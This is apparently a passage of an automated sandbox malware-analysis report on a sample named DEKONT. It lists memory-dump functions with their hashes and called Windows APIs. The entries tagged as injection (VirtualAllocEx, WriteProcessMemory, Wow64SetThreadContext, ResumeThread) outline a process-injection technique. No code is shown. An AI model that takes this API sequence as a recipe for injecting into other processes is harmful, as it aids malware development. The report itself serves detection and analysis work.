Instruction Fuzzy Hash: CA512571904319CFEB11DFA4C884BCEBBF1AF4A704F10809AD549AB251DB315A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 017F3E44 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017F5F59

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e65906e71df04343d6e7212090946d54efd7102f0f2aa02fc7347cb8e11f0de9
Instruction ID: 39769699b29f41de954a9fe4c64d3e411fe55e4d7ba502d7fdf3c45aaed2ae7c
Opcode Fuzzy Hash: e65906e71df04343d6e7212090946d54efd7102f0f2aa02fc7347cb8e11f0de9
Instruction Fuzzy Hash: 7051D371D00329CFDB20DFA5C880B9EBBF5AF49700F1080AAD549AB251DB716E89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 017FA378 Relevance: 1.6, APIs: 1, Instructions: 124
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 017FB952

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 901aa8cceb0cb01a72d94d009f30c7cdef91770358295cb0b4d17dc72e02e8d6
Instruction ID: b7d5e05a3cb5d67684add26abe4b420e86b463885502a7a0cbf4efa8d40ee99a
Opcode Fuzzy Hash: 901aa8cceb0cb01a72d94d009f30c7cdef91770358295cb0b4d17dc72e02e8d6
Instruction Fuzzy Hash: 5A41FEB5D00248CFCB10CFA9D488A9EFBF1FB49310F14806AEA58AB320D734A845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD7C8 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD8A3

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 24fdf9c751c781bfe5097be9c4062295cf9d60112611509332c683f80d1af066
Instruction ID: c069fe8aebf890aea7245da2d33495880f9888990daf07e9632fdb5ffdb67766
Opcode Fuzzy Hash: 24fdf9c751c781bfe5097be9c4062295cf9d60112611509332c683f80d1af066
Instruction Fuzzy Hash: 4141C9B5D012599FCF10CFA9D980AEEFBF1BB49310F24942AE828B7240D735AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD7D0 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD8A3

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dbbaf29c2941cc7a82347f0cba00566a81e3673110605befba033af09456d6f6
Instruction ID: 6c0495240fb76f73df706fe69eb92ba8394d3bab273f6b0980dd8392006338a5
Opcode Fuzzy Hash: dbbaf29c2941cc7a82347f0cba00566a81e3673110605befba033af09456d6f6
Instruction Fuzzy Hash: 8141BAB4D012599FCF10CFA9D984ADEFBF1BB49310F14942AE818B7240D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FB638 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017FD7A3

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1629606bfc666216498196c6595fb9fd009322cec4cbf52c44c3a26b3e8e1d22
Instruction ID: c5460013816b10366d41bbb4a2248a19476bb0d9344450661df2b499a6d52b22
Opcode Fuzzy Hash: 1629606bfc666216498196c6595fb9fd009322cec4cbf52c44c3a26b3e8e1d22
Instruction Fuzzy Hash: B74176B9D002589FCF10CFA9D884ADEFBF5BB19310F14906AE918AB310D335A955CF94

Uniqueness

Uniqueness Score: -1.00%

Function 017FD6D0 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017FD7A3

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0b183381b803426a62638f9fd6cd2a7a303c21501beb80545a3f1629771661cd
Instruction ID: 858311d4e0a912e7f35f0631d8a07836d13cfad4f4c5cd4a909eead75eb2be89
Opcode Fuzzy Hash: 0b183381b803426a62638f9fd6cd2a7a303c21501beb80545a3f1629771661cd
Instruction Fuzzy Hash: C84166B9D002589FCF10CFAAD984ADEFBF5BB49310F14906AE918AB310D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD921 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD9DA

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 930255e3e7cf622603c0de67b15f6790186ff5623f11b11c3a8a65b09561e7c6
Instruction ID: 629b72793e507d7041512adfe3e3e33697044600ce6794a3f00058161bf43041
Opcode Fuzzy Hash: 930255e3e7cf622603c0de67b15f6790186ff5623f11b11c3a8a65b09561e7c6
Instruction Fuzzy Hash: 7841B9B9D042599FCF10CFAAD880AEEFBB5BF59310F14942AE824B7200D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD6A8 Relevance: 1.6, APIs: 1, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ABD75A

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0d81a5d89600e7c4e6bda3c02fb5e20fdd83cb8afe9b43022402fcc49a9b1512
Instruction ID: 601792b5f77239b4cba99ea9442eaad58f1e93dcb22117345b14c4cf963ee1c1
Opcode Fuzzy Hash: 0d81a5d89600e7c4e6bda3c02fb5e20fdd83cb8afe9b43022402fcc49a9b1512
Instruction Fuzzy Hash: 944198B9D002599FCF10CFA9D884ADEFBB5BF49310F10942AE825BB210D735A945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD928 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD9DA

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: efe93a64ec0b61ea5b486bc6933904b0afb63f1ccc27df00f9acec72841a5b39
Instruction ID: b2a0e6c0e258361d749e603f9f0e4b04f79b29d33a08c83c55e7a40f4c0f998d
Opcode Fuzzy Hash: efe93a64ec0b61ea5b486bc6933904b0afb63f1ccc27df00f9acec72841a5b39
Instruction Fuzzy Hash: 5441A9B9D042599FCF10CFAAD880AEEFBB5BB49310F10942AE815B7240C735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD6B0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ABD75A

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ed5d5ad29f391a0dc90e44452173173ba0eb3bbfb65eb458628d5cd03e2e00b4
Instruction ID: 27c8143b722829648110e7ebc931061d10fcb5787039e633c93f71c99b161f78
Opcode Fuzzy Hash: ed5d5ad29f391a0dc90e44452173173ba0eb3bbfb65eb458628d5cd03e2e00b4
Instruction Fuzzy Hash: F63186B9E002599FCF10CFA9D884ADEFBB5BB49310F10942AE825B7210D735A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD580 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 07ABD637

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5e4e85712ac099f8507a41e3724e82f513ea71d8ba45dd9620048aea43afacf1
Instruction ID: edc1545c031e159ec19199b947ede627e777f1d9ca5e06af59aa954c3976064d
Opcode Fuzzy Hash: 5e4e85712ac099f8507a41e3724e82f513ea71d8ba45dd9620048aea43afacf1
Instruction Fuzzy Hash: 4F41CBB4D012599FDB10CFAAD884AEEFBF5BF49310F14842AE418B7240D739A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FA390 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 017FB952

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1ea69484773a194c1508873eff0267592e178e7b529c16b4bf9c6106287c0749
Instruction ID: 8d179efb8479af21362154bed9d74438fcf385b86a45e96ec125712b205280bb
Opcode Fuzzy Hash: 1ea69484773a194c1508873eff0267592e178e7b529c16b4bf9c6106287c0749
Instruction Fuzzy Hash: C24198B8D00258DFCB10CFAAD884A9EFBF5BB49310F14906AE918B7320D335A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 017FB8A1 Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 017FB952

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7f4fb104d08ad311b9b4efcb3be3734087cf4489cdec93cc57a5ce9a0a4a4e2b
Instruction ID: 23261140fb61a8c1e7e4ca5dfa2d4827a63dd8a75c9807510091894efad03e20
Opcode Fuzzy Hash: 7f4fb104d08ad311b9b4efcb3be3734087cf4489cdec93cc57a5ce9a0a4a4e2b
Instruction Fuzzy Hash: A44198B9D00258DFCB10CFA9D484A9EFBF1BB49310F14906AE958B7310D335A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD588 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 07ABD637

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c530c9e2aed1639c64e5e6fd5efbd18339bca46350ea2308f05e106bf16ca316
Instruction ID: 9b8848c07761f1b0084d2350456212e3429235cf989bd165ed48e617b6113c49
Opcode Fuzzy Hash: c530c9e2aed1639c64e5e6fd5efbd18339bca46350ea2308f05e106bf16ca316
Instruction Fuzzy Hash: A931CBB4D012599FDB14DFAAD884AEEFBF5BF49310F14842AE418B7240C739A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05974640 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05974701

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 46c7ad586e6d7fa936cc28dd3ef0223a42fdd9798d9a12a81444f9389e074b3a
Instruction ID: 44adf87018b214a131b1f8becc1824230bd536a3245d95bd0bdccc73bd6379d7
Opcode Fuzzy Hash: 46c7ad586e6d7fa936cc28dd3ef0223a42fdd9798d9a12a81444f9389e074b3a
Instruction Fuzzy Hash: 594129B9900309CFDB14CF99C448AAAFBF5FB89314F248499E519AB321D774A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 032A0530 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 032A05D3

Memory Dump Source

Source File: 00000000.00000002.1373255583.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_DEKONT.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 686388b1bf8c1ae8effaf460e7e15c6930a1c19b75f06a39f163ad702932ebe8
Instruction ID: a5145ec8ed1b5f845b0226cf0a1f7bab81bba3e45bf95c36c72850d9200b5745
Opcode Fuzzy Hash: 686388b1bf8c1ae8effaf460e7e15c6930a1c19b75f06a39f163ad702932ebe8
Instruction Fuzzy Hash: 7B3177B9D01258AFCB10CFA9D584ADEFBF1BB49310F24905AE818B7310D775A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 032A0538 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 032A05D3

Memory Dump Source

Source File: 00000000.00000002.1373255583.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_DEKONT.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7ea4d21fb594befdee4dba22ade16eb0007501579cf43934424d8e149fd543c3
Instruction ID: 481d869b4904743328e464aa05c11a55f8383b3996e6a8d4d0316fefcf7a58a1
Opcode Fuzzy Hash: 7ea4d21fb594befdee4dba22ade16eb0007501579cf43934424d8e149fd543c3
Instruction Fuzzy Hash: 7A3176B9D00258AFCB10CFA9D984ADEFBF5BB49310F24902AE818B7310D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 017FB198 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 017FB22A

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 536fb05104311e6d6dea443ef0fc96ba9699948b23e2bf544195cff5053eaae6
Instruction ID: 785bda6512a51f97fd0be1b964c0598fb19b902181c022a1551bfa836bd295ca
Opcode Fuzzy Hash: 536fb05104311e6d6dea443ef0fc96ba9699948b23e2bf544195cff5053eaae6
Instruction Fuzzy Hash: D331AAB8D042499FCB14CFAAD484ADEFBF5BB48310F14906AE918B7320D335A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD490 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 07ABD516

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ecd897fc7e059e4077070580c4afb094fcf38ba8a7c209bbbc61762c76ac9972
Instruction ID: 223df707fc3f00f7e4ffb62859f094b56d62a69bdd964649c5900b1b8a8b35f1
Opcode Fuzzy Hash: ecd897fc7e059e4077070580c4afb094fcf38ba8a7c209bbbc61762c76ac9972
Instruction Fuzzy Hash: 3731B8B4D012199FCB24CFAAD885ADEFBB5AF49314F14842AE829B7200C735A941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 07ABD498 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 07ABD516

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f14026c8f258b933762aeb70a798e23d83cbc5b96b91bec6bd8903d47737ab95
Instruction ID: cd6dcb85389479fcedc7cfdec85d868d2b687b0b6949ca5aee5c46b38d7b6f75
Opcode Fuzzy Hash: f14026c8f258b933762aeb70a798e23d83cbc5b96b91bec6bd8903d47737ab95
Instruction Fuzzy Hash: C631C9B4D012199FCB24CFAAD880ADEFBB4BB49314F10842AE829B7300C735A901CF94

Uniqueness

Uniqueness Score: -1.00%

Function 059A80E0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 059A815B

Memory Dump Source

Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ba8a52cfdd33d6a713cab2aca567eb5e1dd1e3c5fb34236baeefcb946e8a0692
Instruction ID: 1efc0941db0edae57019a29339352da0f7f4e6986800290f0d7d2f782ded3254
Opcode Fuzzy Hash: ba8a52cfdd33d6a713cab2aca567eb5e1dd1e3c5fb34236baeefcb946e8a0692
Instruction Fuzzy Hash: 6C31AAB5D002189FCB10DFA9D984ADEFBF4AB48320F14845AE815B7350D335AA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 059A73D4 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 059A815B

Memory Dump Source

Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 734777cef6eb43eaa6a42038e73a2110ac560ce79f76ae4dd6b835fc467e530b
Instruction ID: 3978e9752e24759c5faaf5ec80eddfef98c3ebf614162dd961cf118da11931fc
Opcode Fuzzy Hash: 734777cef6eb43eaa6a42038e73a2110ac560ce79f76ae4dd6b835fc467e530b
Instruction Fuzzy Hash: 7A31AAB5D00218DFCB10CFA9D584ADEFBF4AB48320F14846AE815B7310D375AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 059A734C Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 059A815B

Memory Dump Source

Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d0a63c898e80d2760684143e2dcf922c9027383e29c8d745bc89146612dc9708
Instruction ID: 710227a3b5aa25bdcb8560be44de8558a2da8de7f19d66f60eec7b3a1581ca74
Opcode Fuzzy Hash: d0a63c898e80d2760684143e2dcf922c9027383e29c8d745bc89146612dc9708
Instruction Fuzzy Hash: 9731BBB5D00218DFCB10CFAAD584ADEFBF4AB49324F14846AE815B7310D375AA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 017AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372686106.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ad000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2578cea2bd35e10d9308bdb0f6fd59f8aec0b32f3021c042b087c8750e5d866
Instruction ID: 6afb76d012fa0c621127f879a763d7bf215ebbf86e945bf03e9a84dd2d9811f5
Opcode Fuzzy Hash: f2578cea2bd35e10d9308bdb0f6fd59f8aec0b32f3021c042b087c8750e5d866
Instruction Fuzzy Hash: 0E2130B1284300DFDB24DF64D984B13FB61FBC8214F60C6ADE80A0B682C33AC407CA62

Uniqueness

Uniqueness Score: -1.00%

Function 017AD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372686106.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ad000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: d36963793e0d70a8b50074ca428a7621dbc26e96d0ac3a292c9aa59577602cf5
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 1C11BE75544284CFCB12CF54D5C4B16FB62FB88314F24C6A9D8494B656C33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07AB3FB0 Relevance: 5.3, Strings: 4, Instructions: 259COMMON

Download Yara Rule

Strings

[V~*, xrefs: 07AB411C
[V~*, xrefs: 07AB4115
T+-q, xrefs: 07AB42EA
]\`, xrefs: 07AB4232

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$[V~*$]\`
API String ID: 0-1849991408
Opcode ID: 078c71352637b668a2853d82b6d5ee968b5d5dfcd644f5bb067637ccd11c2ed2
Instruction ID: 8dd525410a9bd96d229e7ecff966e1caecfe86f57e3be9683c43c90c94f47e47
Opcode Fuzzy Hash: 078c71352637b668a2853d82b6d5ee968b5d5dfcd644f5bb067637ccd11c2ed2
Instruction Fuzzy Hash: 98B105B0E15259DBCB14CFAAD9809DEFBB6FF89300F14D52AD429BB216D33499028F54

Uniqueness

Uniqueness Score: -1.00%

Function 07AB3F50 Relevance: 4.0, Strings: 3, Instructions: 285COMMON

Download Yara Rule

Strings

[V~*, xrefs: 07AB411C
T+-q, xrefs: 07AB42EA
]\`, xrefs: 07AB4232

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$]\`
API String ID: 0-3978741314
Opcode ID: 88c2f39d93efb70b979e56a838d78f7ae8eec83304fdaf070cfd12aefe69d095
Instruction ID: 10170d7f6a5cd7689a0cc34cd49db4cab8de9fc3c138a21e93aea75320d01401
Opcode Fuzzy Hash: 88c2f39d93efb70b979e56a838d78f7ae8eec83304fdaf070cfd12aefe69d095
Instruction Fuzzy Hash: 4FC124B0E152199BCB14CFAAD9809DEFBB6FF89300F14D52AD429BB216D73499028F54

Uniqueness

Uniqueness Score: -1.00%

Function 07AB3FA1 Relevance: 4.0, Strings: 3, Instructions: 258COMMON

Download Yara Rule

Strings

[V~*, xrefs: 07AB411C
T+-q, xrefs: 07AB42EA
]\`, xrefs: 07AB4232

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$]\`
API String ID: 0-3978741314
Opcode ID: 2055f20e25b2506a3c1f70c591acbdb27f1001026dc8274ba39090831f3136ca
Instruction ID: e245a9ef7049c9b8cbcac9eabc1dc05c5e5c25f8cde30590d6c60fd3859a786f
Opcode Fuzzy Hash: 2055f20e25b2506a3c1f70c591acbdb27f1001026dc8274ba39090831f3136ca
Instruction Fuzzy Hash: EAB105B0E152599BCB04CFAAD9809DEFBF6FF89300F14D52AD429BB216D73499028F54

Uniqueness

Uniqueness Score: -1.00%

Function 07ABB101 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d908c1a00dd3195c0e11707667688a58cf991831fa2eb7725f50d0a711d3754
Instruction ID: 5c17f7233f9ff96adf60cb2e8cfe5f905e63dc046471a46ace40bb1dbd926c81
Opcode Fuzzy Hash: 6d908c1a00dd3195c0e11707667688a58cf991831fa2eb7725f50d0a711d3754
Instruction Fuzzy Hash: 66E11DB4E006198FDB24CFA9C5805ADBBF6FF89304F248169D458A7356D734AD42CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05970598 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8964f9ddf9c5fa8dd4ebfc44040094ef7192e537265ca8eba40a441a898308a
Instruction ID: 58cd964e8763a7625f3be8ab4642502c2f6562d7d737312a9df87ee373957c08
Opcode Fuzzy Hash: e8964f9ddf9c5fa8dd4ebfc44040094ef7192e537265ca8eba40a441a898308a
Instruction Fuzzy Hash: 3612A4B0401755CAF330EFA5E9DC18A3BB9BB8672CF504209D2612F2E9DBB4955ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 07ABC7B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45c17d1105080059c8a2cfb309fd2c5b1d0145b5719700544eb4039687dbf1c
